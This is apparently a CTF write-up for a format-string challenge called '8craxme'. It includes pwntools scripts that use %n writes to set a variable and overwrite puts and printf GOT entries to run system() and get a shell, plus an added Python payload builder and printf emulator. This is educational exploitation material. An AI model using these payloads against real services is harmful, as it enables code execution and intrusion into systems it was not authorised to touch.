Run checksec: NX and canary are enabled.
Load it into IDA: there is a format string vulnerability (our input is passed straight to printf), and there are two flags. We only need to make magic equal 218 or -87117812.
First probe where our input sits among printf's arguments: the offset is 7, i.e. the start of the input is printf's 7th argument.
Modifying magic
Script one: set magic to 218
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./8craxme')
magic = 0x0804A038               # address of magic, from IDA
payload = b""
# 4 address bytes + 214 padding chars = 218 chars printed before %7$n,
# so %7$n stores 218 into magic (our input starts at printf argument 7)
payload += p32(magic) + b"%0214c" + b"%7$n"
#payload2 = fmtstr_payload(7,{magic:218})   # pwntools builds the same write
p.sendline(payload)
p.recv()
p.interactive()
Script two: set magic to -87117812, i.e. 0xFACEB00C. A single %n would have to print about 4 billion characters, so since the value spans four bytes we write it in four passes, one byte per %n, and the running count only has to reach 0x1fa. Note that each %n still stores a full 4 bytes, so the three bytes after magic get clobbered by the later writes; %hhn would store one byte and avoid that.
#!/usr/bin/env python
#-*- coding:utf-8 -*-
from pwn import *
context.log_level = 'debug'
p = process('./8craxme')
magic = 0x0804A038
payload = b""
# the four addresses occupy printf arguments 7..10: magic, magic+1, magic+2, magic+3
payload += p32(magic) + p32(magic+1) + p32(magic+2) + p32(magic+3)
# pad until the low byte of the running count is the wanted byte, then %n;
# the count only grows: 0x10c -> 0x0c, 0x1b0 -> 0xb0, 0x1ce -> 0xce, 0x1fa -> 0xfa
payload += (0x10c - 16)*b'a' + b"%7$n"      # 16 address bytes are already printed
payload += (0x1b0 - 0x10c)*b'b' + b"%8$n"
payload += (0x1ce - 0x1b0)*b'c' + b"%9$n"
payload += (0x1fa - 0x1ce)*b'd' + b"%10$n"
# every %n writes 4 bytes, so magic+4..magic+6 end up holding the high bytes
# of the later counts; %hhn would write a single byte instead
# payload2 = fmtstr_payload(7,{magic:0xFACEB00C})
p.sendline(payload)
p.recv()
p.interactive()
Method three:
Overwrite puts's GOT entry with the address of the code that calls system("cat /home/craxme/flag") (0x80485F3 in the binary). Then, when execution reaches puts("You need be a phd"), it jumps to system("cat /home/craxme/flag") instead.
Script:
#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
p = process('./8craxme')
elf = ELF('./8craxme')
puts_got = elf.got['puts']           # GOT entry that puts@plt jumps through
system_catflag = 0x80485F3           # code in the binary that runs system("cat /home/craxme/flag")
# fmtstr_payload does the byte-wise %n writes for us, input starts at argument 7
payload = fmtstr_payload(7,{puts_got:system_catflag})
p.sendline(payload)
p.interactive()
Method four: from the writeup at https://www.jianshu.com/p/460a3323486f
Overwrite puts's GOT entry with the address just above the read in main, and overwrite printf's GOT entry with system's PLT address; then we get a shell directly?? (I don't really understand this.) Could it be that when puts is called, it goes to the read, and after the read finishes, the printf call that follows invokes system instead?
Script:
#!/usr/bin/env python
#-*-coding:utf-8-*-
from pwn import *
p = process('./8craxme')
elf = ELF('./8craxme')
puts_got = elf.got['puts']
printf_got = elf.got['printf']
system_plt = elf.plt['system']
read_up = 0x80485A1                  # address just above the read in main
# one format string patches both GOT entries: puts -> back into main's read, printf -> system
payload = fmtstr_payload(7,{puts_got:read_up,printf_got:system_plt})
p.sendline(payload)
# the next line read by main goes to the patched printf, i.e. to system;
# send it here or type /bin/sh at the interactive prompt
#p.sendline('/bin/sh\x00')
p.interactive()
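As an added example (not from the original writeup or from pwntools), the byte-wise %n write that scripts one and two build by hand, generalized to any set of 32-bit targets (which is what fmtstr_payload does for methods three and four), together with a small printf emulator that dry-runs the payload and reports what lands in memory, so the padding arithmetic can be checked without the binary. MAGIC, OFFSET and READ_UP are the writeup's values; PUTS_GOT, PRINTF_GOT and SYSTEM_PLT are assumed for illustration only (the real scripts take them from the ELF). The emulator assumes, as in this challenge, that the format string itself is reachable as printf's arguments starting at slot OFFSET.

```python
#!/usr/bin/env python3
# Added example, not part of the original writeup: build the byte-wise %n
# write by hand (scripts one and two; what fmtstr_payload does in methods three
# and four) and dry-run it in a small printf emulator.
import re
import struct

MAGIC = 0x0804A038        # address of magic, from the writeup
OFFSET = 7                # input starts at printf's 7th argument, from the writeup
READ_UP = 0x080485A1      # "just above the read in main", from method four
# ASSUMED for illustration only; the real scripts use elf.got['puts'] etc.
PUTS_GOT = 0x0804A014
PRINTF_GOT = 0x0804A018
SYSTEM_PLT = 0x08048470


def whole_write_payload(target, value, offset):
    """Script-one style: one %n that stores `value` in a single go.
    Only practical for small values, since printf must emit `value` chars."""
    if not 4 <= value < 0x10000:
        raise ValueError("too large for one %n write, use bytewise_write_payload")
    payload = struct.pack("<I", target)
    payload += b"A" * (value - len(payload))   # literal padding consumes no argument
    return payload + b"%%%d$n" % offset


def bytewise_write_payload(writes, offset, use_hhn=False):
    """Store each 32-bit value in `writes` (addr -> value) one byte per %n.
    Byte addresses go first, landing in stack slots offset, offset+1, ...;
    then for each byte we pad until the running character count is congruent
    to that byte mod 256 and emit %k$n.  The count only grows, so at most 255
    padding characters are needed per byte."""
    targets = []                                   # (byte address, wanted byte)
    for addr, value in writes.items():
        for i, b in enumerate(struct.pack("<I", value & 0xFFFFFFFF)):
            targets.append((addr + i, b))
    if use_hhn:
        targets.sort(key=lambda t: t[1])   # 1-byte stores: any order works, ascending is shortest
    else:
        # %n stores 4 bytes and tramples addr+1..addr+3, so write in ascending
        # address order and let each later write repair the earlier damage;
        # only the 3 bytes after the highest target keep junk.
        targets.sort(key=lambda t: t[0])
    addrs = b"".join(struct.pack("<I", a) for a, _ in targets)
    if b"\x00" in addrs or b"%" in addrs:
        raise ValueError("an address byte would terminate or corrupt the format string")
    payload, printed = addrs, len(addrs)
    spec = b"hhn" if use_hhn else b"n"
    for k, (_, want) in enumerate(targets):
        count = printed + (want - printed) % 256   # smallest count >= printed, count % 256 == want
        payload += b"A" * (count - printed) + b"%%%d$%s" % (offset + k, spec)
        printed = count
    return payload


def simulate_printf(fmt, offset, memory):
    """Dry-run the %k$n / %k$hn / %k$hhn directives in `fmt` against `memory`
    (dict addr -> byte).  Positional argument k is read from the format string
    itself as 32-bit word (k - offset), the layout this challenge has.
    Returns the number of characters printed."""
    directive = re.compile(rb"%(\d+)\$(hhn|hn|n)")
    printed = i = 0
    while i < len(fmt) and fmt[i:i + 1] != b"\x00":    # printf stops at NUL
        m = directive.match(fmt, i)
        if m:
            k, kind = int(m.group(1)), m.group(2)
            addr = struct.unpack_from("<I", fmt, (k - offset) * 4)[0]
            size = {b"n": 4, b"hn": 2, b"hhn": 1}[kind]
            for j, b in enumerate((printed & ((1 << 8 * size) - 1)).to_bytes(size, "little")):
                memory[addr + j] = b
            i = m.end()
        elif fmt[i:i + 1] == b"%":
            raise ValueError("emulator only understands %k$n-style directives")
        else:
            printed += 1
            i += 1
    return printed


def dry_run(payload, writes, offset=OFFSET):
    """Feed `payload` to the emulator; return ({addr: value read back}, [clobbered addrs])."""
    mem = {}
    simulate_printf(payload, offset, mem)
    wanted = {a + i for a in writes for i in range(4)}
    spill = sorted(a for a in mem if a not in wanted)
    got = {a: int.from_bytes(bytes(mem.get(a + j, 0) for j in range(4)), "little") for a in writes}
    return got, spill


if __name__ == "__main__":
    got_writes = {PUTS_GOT: READ_UP, PRINTF_GOT: SYSTEM_PLT}
    cases = [
        ("script one", whole_write_payload(MAGIC, 218, OFFSET), {MAGIC: 218}),
        ("script two", bytewise_write_payload({MAGIC: 0xFACEB00C}, OFFSET), {MAGIC: 0xFACEB00C}),
        ("with %hhn", bytewise_write_payload({MAGIC: 0xFACEB00C}, OFFSET, True), {MAGIC: 0xFACEB00C}),
        ("method four", bytewise_write_payload(got_writes, OFFSET), got_writes),
    ]
    for name, pl, writes in cases:
        got, spill = dry_run(pl, writes)
        print("%-12s %4d bytes  ok=%s  clobbered=%s" % (name, len(pl), got == writes, [hex(a) for a in spill]))
```

For {MAGIC: 0xFACEB00C} the builder produces exactly script two's padding (252, 164, 30 and 44 bytes before %7$n..%10$n), and the dry run shows the difference the caveat above describes: with %n the three bytes after magic come back clobbered, with %hhn nothing outside the target is touched. The GOT case shows why address order matters for %n when two targets are adjacent: the later write repairs what the earlier one trampled.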